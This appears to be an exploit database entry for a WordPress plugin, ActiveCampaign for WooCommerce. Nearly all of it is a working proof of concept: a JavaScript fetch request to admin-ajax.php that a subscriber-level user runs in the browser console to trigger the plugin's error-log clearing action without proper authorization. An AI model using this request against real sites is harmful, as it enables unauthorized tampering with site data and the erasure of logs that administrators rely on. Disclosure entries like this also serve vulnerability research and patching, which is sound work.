Share
## https://sploitus.com/exploit?id=WPEX-ID:6536946A-7EBF-4F8F-9446-36EC2A2A3AD2
Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=activecampaign_for_woocommerce_clear_error_log',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));